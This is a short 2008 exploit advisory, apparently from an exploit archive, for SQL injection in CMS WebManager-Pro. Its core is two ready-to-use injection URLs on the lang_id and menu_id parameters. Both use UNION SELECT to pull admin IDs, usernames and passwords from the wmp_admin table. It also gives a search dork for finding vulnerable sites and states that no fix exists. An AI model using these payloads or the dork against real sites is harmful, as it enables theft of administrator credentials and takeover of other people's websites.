CMS WebManager-Pro Multiple Remote SQL Injection Vulnerabilities

2008-05-18 00:00:00

:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM

[ Discovered by dun \ dun[at]strcpy.eu ]

##################################################################
# [ CMS Webmanager-pro ] Remote SQL Injection Vulnerability #
##################################################################
#
# Script site: http://webmanager-pro.com/
#
# Vuln:
# http://site.com/index.php?lang_id=-1+UNION+SELECT+concat_ws(char(58),id,adminuser,adminpass,status)+from+wmp_admin+limit+0,1/*
# http://site.com/index.php?menu_id=-1+UNION+SELECT+concat_ws(char(58),id,adminuser,adminpass,status)+from+wmp_admin+limit+0,1/*
#
# Dork example: "CMS Webmanager-pro"
#
###############################################
# Greetz: D3m0n_DE * sid_psycho * and otherz..
###############################################

[ dun / 2008 ]

*******************************************************************************************

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.